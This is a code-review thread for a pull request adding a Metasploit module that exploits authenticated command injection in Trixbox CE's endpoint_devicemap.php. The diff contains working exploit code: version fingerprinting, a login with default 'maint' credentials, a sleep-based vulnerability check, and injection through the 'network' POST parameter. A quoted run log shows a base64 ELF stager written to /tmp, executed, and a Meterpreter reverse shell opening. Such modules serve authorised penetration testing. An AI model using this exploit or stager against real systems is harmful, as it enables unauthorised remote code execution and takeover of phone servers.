modules/exploits/unix/webapp/trixbox_ce_endpoint_devicemap_rce.rb

```diff
@@ -0,0 +1,187 @@
+    elsif Gem::Version.new(version).between?(Gem::Version.new('2.0'), Gem::Version.new('2.4'))
+      @uri = normalize_uri(target_uri.path, '/maint/modules/11_endpointcfg/endpoint_devicemap.php')
+    elsif Gem::Version.new(version) == Gem::Version.new('1.2')
+      @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
+    else
+      return nil
+    end
+    return version
+  end
+
+  def login(user, pass, _opts = {})
+    uri = normalize_uri(target_uri.path, '/maint/')
+    print_status("#{peer} - Authenticating using \"#{user}:#{pass}\" credentials...")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+      'authorization' => basic_auth(user, pass)
+    })
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed.')
+    end
+    if res.code == 200
+      print_good("#{peer} - Authenticated successfully.")
+    elsif res.code == 401
+      print_error("#{peer} - Authentication failed.")
+    else
+      print_error("#{peer} - The host responded with an unexpected status code: #{res.code}.")
+    end
+    return res
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_cgi({
+      'uri' => @uri,
+      'method' => 'POST',
+      'authorization' => basic_auth(user, pass),
+      'vars_post' => {
+        'network' => ";$(#{cmd})"
+      }
+    })
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def check
+    res = login(user, pass)
+    unless res
+      vprint_error("#{peer} - Connection failed.")
+      return CheckCode::Detected
+    end
+    if res.code == 200
+      version = get_target(res)
+      if version.nil?
+        vprint_error("#{peer} - The target is not vulnerable.")
+        return CheckCode::Safe
+      end
+
+      delay = rand(7...10)
+      cmd = "sleep #{delay}"
+      print_status("#{peer} - Verifying remote code execution by attempting to execute '#{cmd}'.")
+      t1 = Time.now.to_i
+      res = execute_command(cmd)
+      t2 = Time.now.to_i
+      unless res
+        vprint_error("#{peer} - Connection failed.")
+        return CheckCode::Detected
+      end
+      diff = t2 - t1
+      if diff >= delay
+        print_good("#{peer} - Response received after #{diff} seconds.")
+        return CheckCode::Vulnerable
+      else
+        print_error("#{peer} - Response wasn't received within the expected period of time.")
+        return CheckCode::Safe
+      end
+    end
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, 'Connection failed.')
+  end
+
+  def exploit
+    res = login(user, pass)
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed.')
+    end
+    if res.code == 200
+      version = get_target(res)
+      if version.nil?
+        fail_with(Failure::NotVulnerable, 'The target is not vulnerable')
```

Comment:
Can we replace this with a `print_error` call considering this is what we do elsewhere and this is the more appropriate way to handle things?

Reply:
Sure. Updated!

> Ah so found out why it wasn't detecting that version. Your last check was waaaaaaaaaaay too specific. Here is what is was before:
> 
> ```
> elsif Gem::Version.new(version) == Gem::Version.new('1.2')
> ```
> 
> And here is the new version:
> 
> ```
> elsif Gem::Version.new(version).between?(Gem::Version.new('1.2'), Gem::Version.new('1.9'))
>       @uri = normalize_uri(target_uri.path, '/maint/endpoint_devicemap.php')
> ```
> 
> Lesson here: **Don't do checks specifically on a one branches's release number. There are typically multiple releases within a branch or within one major.minor release**.
> 
> Edit here is the code working now with these updates:
> 
> ```
> msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit
> 
> [*] Started reverse TCP handler on 192.168.205.1:4444 
> [*] 192.168.205.146:80 - Authenticating using "maint:password" credentials...
> [+] 192.168.205.146:80 - Authenticated successfully.
> [+] 192.168.205.146:80 - Trixbox CE 1.2.3 identified.
> [*] 192.168.205.146:80 - Sending payload (150 bytes)...
> [*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjqAAAAgAEAAAcAAAAAEAAAu8WPOqja3tl0JPRYMcmxHzFYFQNYFYPo/OIw5TD2iyGz5biWb4A8qfbdoQR2Snr/t92x/l8cSRD8qah4mvF6LDWLm410C97S/hWupj1OjEc+jogtPuQtO93J5PairzZxHkSRMGci3SRoVFSnqb9q6clMwpTAzaeno938rrVHsNuFe3mbY7v5npTdQZ9qHrEbax6xW6Ge>>'/tmp/FrZkS.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/xkjQL' < '/tmp/FrZkS.b64' ; chmod +x '/tmp/xkjQL' ; '/tmp/xkjQL' ; rm -f '/tmp/xkjQL' ; rm -f '/tmp/FrZkS.b64'"]
> [*] Transmitting intermediate stager...(106 bytes)
> [*] Sending stage (980808 bytes) to 192.168.205.146
> [*] Meterpreter session 10 opened (192.168.205.1:4444 -> 192.168.205.146:32775) at 2020-05-03 23:57:12 -0500
> [*] Command Stager progress - 100.00% done (799/799 bytes)
> 
> meterpreter > 
> ```

Yap! Updated